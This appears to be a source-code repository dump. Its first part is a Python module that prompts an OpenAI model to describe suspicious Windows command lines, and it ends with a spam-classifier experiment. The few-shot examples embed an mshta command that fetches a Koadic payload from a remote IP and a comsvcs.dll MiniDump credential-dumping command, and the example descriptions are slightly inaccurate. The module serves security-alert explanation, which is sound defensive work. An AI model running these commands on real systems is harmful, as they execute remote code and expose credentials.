27 | PREFIX_CMD2DESC_DESC2CMD_TAG_2EXAMPLES = '''###
28 | ## Command
29 | \"cmd.exe\" \/c mshta.exe http:\/\/10.254.0.94:80\/133540\/koadic1 & timeout 5 & tasklist \/svc | findstr \/i mshta
30 | ## Tags
31 | win_pc_suspicious_tasklist_command,win_suspicious_findstr
32 | ## Description
33 | The above command will execute a suspicious mshta.exe instance on the specified URL and then timeout after 5 seconds. It will then list all services with \"mshta\" in their name using the \"tasklist \/svc\" command.
34 | ###
35 | ## Tags
36 | win_process_dump_rundll32_comsvcs,win_susp_wmi_execution,win_susp_wmic_proc_create_rundll32
37 | ## Description
38 | The below command will dump the process memory of \"rundll32.exe\" to \"C:\\windows\\temp\\scomcheck.tmp\". The \"MiniDump 572\" parameter will cause the dump to be written to a MiniDump file.
39 | ## Command
40 | \"C:\\Windows\\System32\\Wbem\\WMIC.exe\" \/privileges:enable process call create \"rundll32.exe C:\\windows\\system32\\comsvcs.dll MiniDump 572 c:\\windows\\temp\\scomcheck.tmp full\"
41 | ###
42 | '''
43 |
44 |
45 | PREFIX_CMD2DESC_DESC2CMD_2EXAMPLES ='''###
46 | ## Command
47 | \"cmd.exe\" \/c mshta.exe http:\/\/10.254.0.94:80\/133540\/koadic1 & timeout 5 & tasklist \/svc | findstr \/i mshta
48 | ## Description
49 | The above command will execute a suspicious mshta.exe instance on the specified URL and then timeout after 5 seconds. It will then list all services with \"mshta\" in their name using the \"tasklist \/svc\" command.
50 | ## Description
51 | The below command will dump the process memory of \"rundll32.exe\" to \"C:\\windows\\temp\\scomcheck.tmp\". The \"MiniDump 572\" parameter will cause the dump to be written to a MiniDump file.
52 | ## Command
53 | \"C:\\Windows\\System32\\Wbem\\WMIC.exe\" \/privileges:enable process call create \"rundll32.exe C:\\windows\\system32\\comsvcs.dll MiniDump 572 c:\\windows\\temp\\scomcheck.tmp full\"
54 | ###
55 | '''
56 |
57 |
58 | def preprocess_cmd_data(cmd, max_cmd_len):
59 | """
60 | replaces "\n" with "" and reduces the data length.
61 | :param cmd: command line data
62 | :param max_cmd_len: the max data length
63 | """
64 | return cmd.replace("\n", " ")[:max_cmd_len]
65 |
66 |
67 | def preprocess_tags_str(tags):
68 | """
69 | replaces susp with suspicious otherwise, it can be miss-interpretted as suspended
70 | :param tags: tags
71 | """
72 | if tags:
73 | tags = tags.replace("_susp_", "_suspicious_")
74 | return tags
75 |
76 |
77 | def get_prompt_for_desc_from_cmd_tag(
78 | cmd,
79 | tags,
80 | max_cmd_len=200,
81 | include_tag=True,
82 | include_prefix=False
83 | ):
84 | """
85 | return a prompt as
86 | ## Command
87 | cmd.exe
88 | ## Tags
89 | win_tags
90 | ## Description
91 | the above command
92 | """
93 | cmd = preprocess_cmd_data(cmd, max_cmd_len)
94 |
95 | if include_tag:
96 | prefix = PREFIX_CMD2DESC_DESC2CMD_TAG_2EXAMPLES
97 | prompt = STR_PREFIX_CMD + cmd + "\n" + STR_PREFIX_TAGS + tags + "\n" + STR_PREFIX_ABOVE_DESC
98 | else:
99 | prefix = PREFIX_CMD2DESC_DESC2CMD_2EXAMPLES
100 | prompt = STR_PREFIX_CMD + cmd + "\n" + STR_PREFIX_ABOVE_DESC
101 |
102 | if include_prefix:
103 | prompt = prefix + prompt
104 | return prompt
105 |
106 |
107 | def get_prompt_for_cmd_from_tag_desc(
108 | tags,
109 | desc,
110 | cmd,
111 | max_cmd_len=200,
112 | include_tag=True,
113 | include_prefix=False
114 | ):
115 | """
116 | returns a prompt as
117 | ## Tags
118 | win_tags
119 | ## Description
120 | the below command will ...
121 | ## Command
122 | cmd.exe
123 | """
124 | cmd = preprocess_cmd_data(cmd, max_cmd_len)
125 |
126 | if include_tag:
127 | prefix = PREFIX_CMD2DESC_DESC2CMD_TAG_2EXAMPLES
128 | prompt = STR_PREFIX_TAGS + tags + "\n" + STR_PREFIX_BELOW_DESC + desc + "\n" + STR_PREFIX_CMD + cmd
129 | else:
130 | prefix = PREFIX_CMD2DESC_DESC2CMD_2EXAMPLES
131 | prompt = STR_PREFIX_BELOW_DESC + desc + "\n" + STR_PREFIX_CMD + cmd
132 |
133 | if include_prefix:
134 | prompt = prefix + prompt
135 | return prompt
136 |
137 |
138 | def get_prompt_for_combined_desc(
139 | cmd,
140 | desc1,
141 | desc2,
142 | max_cmd_len=200
143 | ):
144 | """
145 | return a prompt as
146 | STR_PREFIX_COMBINED_DESC
147 | ## Command
148 | ...
149 | ## Description1
150 | The command
151 | ## Description2
152 | The command
153 | ## Description
154 | The command
155 | """
156 | cmd = preprocess_cmd_data(cmd, max_cmd_len)
157 |
158 | prompt = STR_PREFIX_COMBINED_DESC + STR_PREFIX_CMD + cmd + "\n" + STR_PREFIX_FIRST_DESC + desc1 + "\n"
159 | prompt += STR_PREFIX_SECOND_DESC + desc2 + "\n" + STR_PREFIX_DESC
160 | return prompt
161 |
162 |
163 | def run_openai_completion(
164 | prompt,
165 | engine,
166 | n,
167 | temperature=0.7,
168 | max_tokens=300,
169 | ):
170 | """
171 | calls openai completion api.
172 | :param prompt: prompt data
173 | :param engine: openai engine
174 | :param n: number of outputs
175 | :param temperature: temperature to contral randomness, ranging between 0.0 and 1.0
176 | :param max_tokens: max output token size
177 | """
178 | #to remove multi-line python code text add "\n"
179 | return openai.Completion.create(
180 | prompt=prompt,
181 | engine=engine,
182 | n=n,
183 | temperature=temperature,
184 | max_tokens=max_tokens,
185 | stop=["##", "\n"]
186 | )
187 |
188 |
189 | def generate_text_list_with_prompt(
190 | prompt,
191 | engine="code-davinci-002",
192 | n=5,
193 | temperature=0.7,
194 | sleep_time=30
195 | ):
196 | """
197 | generates a list of text with the prompt.
198 | :param prompt: prompt data
199 | :param engine: openai engine
200 | :param n: number of outputs
201 | :param temperature: temperature to contral randomness, ranging between 0.0 and 1.0
202 | :param max_tokens: max output token size
203 | :param sleep_time: sleep time in seconds
204 | """
205 | text_list = []
206 | while True:
207 | #if there are temp errors, then sleep and retry
208 | try:
209 | logging.debug("prompt:{}".format(prompt))
210 | res = run_openai_completion(
211 | prompt, engine=engine, n=n, temperature=temperature)
212 | logging.debug("res:{}".format(res))
213 | text_list = [item['text'] for item in res['choices']]
214 | break
215 | except openai.error.RateLimitError as ex:
216 | logging.error("RateLimitError, ex:{}".format(ex))
217 | time.sleep(sleep_time)
218 | except openai.error.APIConnectionError as ex:
219 | logging.error("APIConnectionError, ex:{}".format(ex))
220 | time.sleep(sleep_time)
221 | return text_list
222 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "[]"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright [yyyy] [name of copyright owner]
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
--------------------------------------------------------------------------------
/spam_detector/gpt3_models.py:
--------------------------------------------------------------------------------
1 | import os
2 | import time
3 | import pandas as pd
4 | import logging
5 | from sklearn.metrics import classification_report
6 | import openai
7 |
8 |
9 | # set your openai api key
10 | openai.api_key = os.getenv("OPENAI_API_KEY")
11 | # disable openai's logging messages
12 | logging.getLogger("openai").setLevel(logging.ERROR)
13 |
14 | logging.basicConfig(format="%(asctime)s %(message)s",
15 | datefmt="%Y-%m-%d %H:%M:%S", level=logging.INFO)
16 | logger = logging.getLogger(__name__)
17 |
18 |
19 | PROMPT_TEMPLATE = "Classify the {data_type} as {positive_label} or {negative_label}."
20 | EXAMPLE_TEMPLATE = "\n{data_type}: {text}\nLabel: {label}"
21 | QUERY_TEMPLATE = "\n{data_type}: {text}\nLabel:"
22 |
23 |
24 | def generate_prompt_text(
25 | df,
26 | data_type="Message",
27 | positive_label="Spam",
28 | negative_label="Ham",
29 | column_text="text",
30 | column_label="label"
31 | ):
32 | """
33 | generate a prompt from the input df.
34 | :param df: data frame for input data
35 | :param data_type: the type of data
36 | :param positive_label: the value for positive label
37 | :param negative_label: the value for negative label
38 | :param column_text: column for text
39 | :param column_label: column for label
40 | """
41 | prompt = PROMPT_TEMPLATE.format(
42 | data_type=data_type, positive_label=positive_label, negative_label=negative_label)
43 | if df is None or len(df) == 0:
44 | return prompt
45 |
46 | for _ix, row in df.iterrows():
47 | text = row[column_text]
48 | label = row[column_label]
49 | example_text = EXAMPLE_TEMPLATE.format(
50 | data_type=data_type, text=text, label=label)
51 | prompt += example_text
52 | return prompt
53 |
54 |
55 | def get_openai_completion(
56 | prompt,
57 | model_name="text-davinci-002",
58 | max_tokens=6,
59 | sleep_time=60
60 | ):
61 | """
62 | get a completion response from openai.
63 | :param prompt: the input prompt
64 | :param model_name: model name
65 | :param max_tokens: the max token size for response
66 | :param sleep_time: sleep time in seconds
67 | """
68 | label = None
69 | while True:
70 | try:
71 | logging.debug("prompt:{}".format(prompt))
72 | res = openai.Completion.create(
73 | model=model_name,
74 | prompt=prompt,
75 | max_tokens=max_tokens,
76 | temperature=0,
77 | stop="\n"
78 | )
79 | logging.debug("res:{}".format(res))
80 |
81 | #remove the first white space and return the first word as a label.
82 | completion = res["choices"][0]["text"].strip()
83 | label = completion.split()[0]
84 | break
85 | except openai.error.RateLimitError as ex:
86 | logging.info("RateLimitError, ex:{}".format(ex))
87 | time.sleep(sleep_time)
88 | except openai.error.APIConnectionError as ex:
89 | logging.info("APIConnectionError, ex:{}".format(ex))
90 | time.sleep(sleep_time)
91 | return label
92 |
93 |
94 | def upload_train_jsonl_file(
95 | path_jsonl,
96 | df_train,
97 | data_type="Message",
98 | positive_label="Spam",
99 | negative_label="Ham",
100 | column_text="text",
101 | column_label="label",
102 | purpose="fine-tune",
103 | fine_tune_context_sample_size=4
104 | ):
105 | """
106 | upload a train jsonl file to openai.
107 | :param path_jsonl: the path for training jsonl file
108 | :param df_train: df for training data
109 | :param data_type: data type
110 | :param positive_label: the value for positive label
111 | :param negative_label: the value for negative label
112 | :param column_text: column for text
113 | :param column_label: column for label
114 | :param purpose: the purpose of training data, fine-tune or classifications
115 | :param fine_tune_context_sample_size: the sampe size for prompt context
116 | """
117 | text_label = "Label:"
118 | dict_items = []
119 | for ix in range(0, len(df_train), fine_tune_context_sample_size):
120 | df_items = df_train.iloc[ix:ix+fine_tune_context_sample_size]
121 | context_prompt = generate_prompt_text(
122 | df_items, data_type=data_type,
123 | positive_label=positive_label, negative_label=negative_label,
124 | column_text=column_text, column_label=column_label)
125 | label_idx = context_prompt.rfind(text_label) + len(text_label)
126 | prompt = context_prompt[:label_idx]
127 | completion = context_prompt[label_idx:]
128 | dict_items.append({"prompt": prompt, "completion": completion})
129 |
130 | df = pd.DataFrame(dict_items)
131 | df.to_json(path_jsonl, orient="records", lines=True)
132 | logger.info("train_jsonl:{}, df.shape:{}".format(path_jsonl, df.shape))
133 |
134 | #update the file to openai
135 | try:
136 | res = openai.File.create(file=open(path_jsonl), purpose=purpose)
137 | train_file_id = res["id"]
138 | except Exception as ex:
139 | logger.error("openai.File.create() got an error, ex:{}".format(ex))
140 | train_file_id = None
141 | return train_file_id
142 |
143 |
144 | def retrieve_openai_model(fine_tune_id):
145 | """
146 | retreive the status of model fine-tuning.
147 | :param fine_tune_id: the id for model
148 | """
149 | try:
150 | res = openai.FineTune.retrieve(id=fine_tune_id)
151 | id = res["id"]
152 | status = res["status"] # the status will be succeeded when completed.
153 | fine_tuned_model = res["fine_tuned_model"]
154 | logger.info("id:{}, status:{}, fine_tuned_model:{}".format(
155 | id, status, fine_tuned_model))
156 | except Exception as ex:
157 | logger.error("openai.FineTune.retrieve() got an error, ex:{}".format(ex))
158 | status, fine_tuned_model = None, None
159 | return status, fine_tuned_model
160 |
161 |
162 | def finetune_openai_model(
163 | training_file_id,
164 | suffix="detection",
165 | model="davinci",
166 | n_epochs=2,
167 | sleep_time_for_finetuning=60
168 | ):
169 | """
170 | fine-tune an openai model.
171 | :param training_file_id: the file id for training data
172 | :param suffix: suffix for the model name
173 | :param model: the baseline model name
174 | :param n_epochs: number of training epochs
175 | :param sleep_time_for_finetuning: sleep time in seconds
176 | """
177 | logger.info("## finetune_openai_model: {}".format(locals()))
178 |
179 | try:
180 | res = openai.FineTune.create(training_file=training_file_id,
181 | suffix=suffix,
182 | model=model,
183 | n_epochs=n_epochs)
184 | fine_tune_id = res["id"]
185 | status = res["status"]
186 | fine_tuned_model = res["fine_tuned_model"]
187 | logger.info("fine_tune_id:{}, status:{}, fine_tuned_model:{}".format(
188 | fine_tune_id, status, fine_tuned_model))
189 | except Exception as ex:
190 | return None
191 |
192 | fine_tuned_model = None
193 | if sleep_time_for_finetuning > 0:
194 | while status != "succeeded":
195 | time.sleep(sleep_time_for_finetuning)
196 | try:
197 | status, fine_tuned_model = retrieve_openai_model(fine_tune_id)
198 | logger.info("finetuning status:{}".format(status))
199 | except Exception as ex:
200 | logger.info(
201 | "finetuning retrieve_openai_model ex:{}".format(ex))
202 | logger.info("finetuning status response:{}".format(res))
203 | return fine_tuned_model
204 |
205 |
206 | def fine_tune_gpt3_model(
207 | df_train,
208 | path_train_jsonl,
209 | model_name,
210 | data_type="Message",
211 | positive_label="Spam",
212 | negative_label="Ham",
213 | column_text="text",
214 | column_label="label",
215 | fine_tune_context_sample_size=4
216 | ):
217 | """
218 | fine-tune a gpt3 model with the training dataset.
219 | :param df_train: df for training data
220 | :param path_train_jsonl: file path for training json file
221 | :param model_name: baseline model name
222 | :param data_type: data type
223 | :param positive_label: the value for positive label
224 | :param negative_label: the value for negative label
225 | :param column_text: the column for text
226 | :param column_label: the column for label
227 | :param fine_tune_context_sample_size: sample size for context prompt
228 | """
229 | training_file_id = upload_train_jsonl_file(
230 | path_train_jsonl,
231 | df_train,
232 | data_type=data_type,
233 | positive_label=positive_label,
234 | negative_label=negative_label,
235 | column_text=column_text,
236 | column_label=column_label,
237 | purpose="fine-tune",
238 | fine_tune_context_sample_size=fine_tune_context_sample_size
239 | )
240 | logger.info("training_file_id:{}".format(training_file_id))
241 | if training_file_id is None:
242 | return None
243 |
244 | fine_tuned_model_train = finetune_openai_model(
245 | training_file_id=training_file_id,
246 | suffix="detection_{}".format(data_type.lower()),
247 | model=model_name,
248 | n_epochs=2,
249 | sleep_time_for_finetuning=60
250 | )
251 | logger.info("fine_tuned_model_train:{}".format(fine_tuned_model_train))
252 | return fine_tuned_model_train
253 |
254 |
255 | def classify_message(
256 | message,
257 | path_train_data="spam_data/experiment_1/train_2.csv",
258 | num_samples_in_prompt=2
259 | ):
260 | """
261 | classify the input message as spam or ham.
262 | spam_data/experiment_1/train_2.csv file has one ham and one spam samples.
263 | :param message: message data
264 | :param path_train_data: file path for few-shot samples
265 | :param num_samples_in_prompt: the number of samples in prompt
266 | """
267 | df_train = pd.read_csv(path_train_data, sep="\t")[:num_samples_in_prompt]
268 |
269 | context_prompt = generate_prompt_text(
270 | df_train, data_type="Message",
271 | positive_label="Spam", negative_label="Ham",
272 | column_text="text", column_label="label")
273 |
274 | query_text = QUERY_TEMPLATE.format(data_type="Message", text=message)
275 | prompt = context_prompt + query_text
276 | logger.info("prompt:{}".format(prompt))
277 |
278 | label = get_openai_completion(prompt, model_name="text-davinci-002")
279 | logger.info("label:{}".format(label))
280 | return label
281 |
282 |
283 | def evaluate_gpt3_model(
284 | path_train_data,
285 | path_test_data,
286 | model_name="text-davinci-002",
287 | data_type="Message",
288 | column_text="text",
289 | column_label="label",
290 | positive_label="Spam",
291 | negative_label="Ham",
292 | fine_tune=False,
293 | fine_tuned_model="",
294 | fine_tune_context_sample_size=4,
295 | prompt_context_sample_size=3,
296 | sleep_time=1
297 | ):
298 | """
299 | evaluate a gpt3 model with training and test datasets.
300 | :param path_train_data: path for training dataset
301 | :param path_test_data: path for test dataset
302 | :param model_name: baseline gpt3 model name, text-davinci-002 for few-shot, davinci for fine-tuning
303 | :param data_type: data type
304 | :param column_text: the column for text
305 | :param column_label: the column for label
306 | :param positive_label: the value for positive label
307 | :param negative_label: the value for negative label
308 | :param fine_tune: True to fine-tune
309 | :param fine_tuned_model: fine-tuned model name
310 | :param fine_tune_context_sample_size: the sample size for fine-tuning context prompt
311 | :param prompt_context_sample_size: the sample size for few-shot context prompt
312 | :param sleep_time: sleep time in seconds
313 | """
314 | df_train = pd.read_csv(path_train_data, sep="\t")
315 | logger.info("path_train_data:{}, df_train.shape:{}".format(
316 | path_train_data, df_train.shape))
317 |
318 | if fine_tune:
319 | path_train_jsonl = path_train_data + ".finetune.jsonl"
320 | model_name = fine_tune_gpt3_model(
321 | df_train, path_train_jsonl, model_name,
322 | data_type=data_type,
323 | positive_label=positive_label,
324 | negative_label=negative_label,
325 | column_text=column_text,
326 | column_label=column_label,
327 | fine_tune_context_sample_size=fine_tune_context_sample_size)
328 | if model_name is None:
329 | return None
330 | df_train = df_train.sample(prompt_context_sample_size, replace=False)
331 | elif fine_tuned_model:
332 | model_name = fine_tuned_model
333 | df_train = df_train.sample(prompt_context_sample_size, replace=False)
334 |
335 | context_prompt = generate_prompt_text(
336 | df_train, data_type=data_type,
337 | positive_label=positive_label, negative_label=negative_label,
338 | column_text=column_text, column_label=column_label)
339 | logger.info("context_prompt:{}".format(context_prompt))
340 |
341 | df_test = pd.read_csv(path_test_data, sep="\t")
342 | logger.info("path_test_data:{}, df_test.shape:{}".format(
343 | path_test_data, df_test.shape))
344 |
345 | QUERY_TEMPLATE = "\n{data_type}: {text}\nLabel:"
346 | y_test, y_pred = [], []
347 | count_correct = 0
348 | for ix, row in df_test.iterrows():
349 | text = row[column_text]
350 | label = row[column_label]
351 | logger.info("{}.text:{}".format(ix, text))
352 | query_text = QUERY_TEMPLATE.format(data_type=data_type, text=text)
353 | prompt = context_prompt + query_text
354 | completion = get_openai_completion(prompt, model_name=model_name)
355 | if completion is not None:
356 | y_test.append(label == positive_label)
357 | y_pred.append(completion == positive_label)
358 | count_correct += 1 if label == completion else 0
359 | if sleep_time > 0:
360 | time.sleep(sleep_time)
361 | logger.info("label:{}, completion:{}, count_correct:{}".format(
362 | label, completion, count_correct))
363 |
364 | return classification_report(y_test, y_pred, output_dict=True)
365 |
--------------------------------------------------------------------------------
/spam_detector/spam_detector.py:
--------------------------------------------------------------------------------
1 | import os
2 | import logging
3 | import argparse
4 | import glob
5 | import numpy as np
6 | import pandas as pd
7 | import shutil
8 | from matplotlib import pyplot
9 |
10 | from sklearn_models import evaluate_sklearn_model
11 | from gpt3_models import evaluate_gpt3_model, classify_message
12 |
13 |
14 | logging.basicConfig(format="%(asctime)s %(message)s",
15 | datefmt="%Y-%m-%d %H:%M:%S", level=logging.INFO)
16 | logger = logging.getLogger(__name__)
17 |
18 |
19 | MAX_TEXT_DATA_LEN = 200
20 | MAX_SKLEARN_ML_FEATURES = 1000
21 |
22 |
23 | def generate_datasets(
24 | path_output_folder="spam_data",
25 | path_input_tsv_file="spam_data/SMSSpamCollection",
26 | column_text="text",
27 | column_label="label",
28 | positive_label="Spam",
29 | train_sample_size_list=[1024, 512, 32, 8, 2],
30 | test_sample_size=256,
31 | max_text_data_len=MAX_TEXT_DATA_LEN
32 | ):
33 | """
34 | generate train and test datasets from path_input_tsv_file.
35 | :param path_output_folder: output folder
36 | :param path_input_tsv_file: input data file
37 | :param column_text: column for text data
38 | :param column_label: column for label data
39 | :param positive_label: label value for positive samples
40 | :param train_sample_size_list: a list of training sample sizes
41 | :param test_sample_size: test sample size
42 | :param max_text_data_len: max text length for pre-processing
43 | """
44 | # load the input tsv file
45 | df = pd.read_csv(path_input_tsv_file, header=None,
46 | sep="\t", names=[column_label, column_text])
47 |
48 | # pre-process the label and text columns.
49 | df["label"] = df["label"].apply(lambda x: x.capitalize())
50 | df["text"] = df["text"].apply(lambda x: x[:max_text_data_len])
51 | logger.info("{}, df.shape:{}".format(path_input_tsv_file, df.shape))
52 | logger.info("df['label'].value_counts:{}".format(
53 | df["label"].value_counts()))
54 |
55 | # suffle the df and split it into train and test datasets.
56 | df = df.sample(frac=1, replace=False)
57 | df_test, df_train = df[:test_sample_size], df[test_sample_size:]
58 | logger.info("df_test.shape:{}".format(df_test.shape))
59 | logger.info("df_test['label'].value_counts:{}".format(
60 | df_test["label"].value_counts()))
61 |
62 | logger.info("df_train.shape:{}".format(df_train.shape))
63 | logger.info("df_train['label'].value_counts:{}".format(
64 | df_train["label"].value_counts()))
65 |
66 | path_output = os.path.join(path_output_folder, "train.csv")
67 | df_train.to_csv(path_output, sep="\t", index=False)
68 |
69 | path_output = os.path.join(path_output_folder, "test.csv")
70 | df_test.to_csv(path_output, sep="\t", index=False)
71 |
72 | is_positive = df_train["label"] == positive_label
73 | df_train_positive = df_train[is_positive]
74 | df_train_negative = df_train[~is_positive]
75 |
76 | # generate training datasets
77 | for train_sample_size in train_sample_size_list:
78 | positive_sample_size = negative_sample_size = train_sample_size//2
79 | df_train_positive = df_train_positive.sample(
80 | positive_sample_size, replace=False)
81 | df_train_negative = df_train_negative.sample(
82 | negative_sample_size, replace=False)
83 | # create a balanced dataset both from positive and negative samples
84 | df_train_all = pd.concat(
85 | [df_train_positive, df_train_negative]).sample(frac=1, replace=False)
86 |
87 | path_output = os.path.join(
88 | path_output_folder, "train_{}.csv".format(train_sample_size))
89 | df_train_all.to_csv(path_output, sep="\t", index=False)
90 | logger.info("{}, df_train_all.shape:{}".format(
91 | path_output, df_train_all.shape))
92 | logger.info("df_train_all['label'].value_counts:{}".format(
93 | df_train_all["label"].value_counts()))
94 |
95 |
96 | def evaluate_model_with_train_sample_sizes(
97 | path_results_output,
98 | model_name="RandomForest",
99 | path_data_folder="spam_data",
100 | train_sample_size_list=[2, 8, 32, 512, 1024],
101 | data_type="Message",
102 | column_text="text",
103 | column_label="label",
104 | positive_label="Spam",
105 | negative_label="Ham",
106 | fine_tune=True,
107 | fine_tuned_model="",
108 | fine_tune_context_sample_size=4,
109 | prompt_context_sample_size=3,
110 | sleep_time=1
111 | ):
112 | """
113 | evaluate a ML model with train sample sizes.
114 | :param path_results_output: path for outputs
115 | :param model_name: model name
116 | :param path_data_folder: path for data
117 | :param train_sample_size_list: a list of train sample sizes
118 | :param data_type: data type
119 | :param column_text: the column for text data
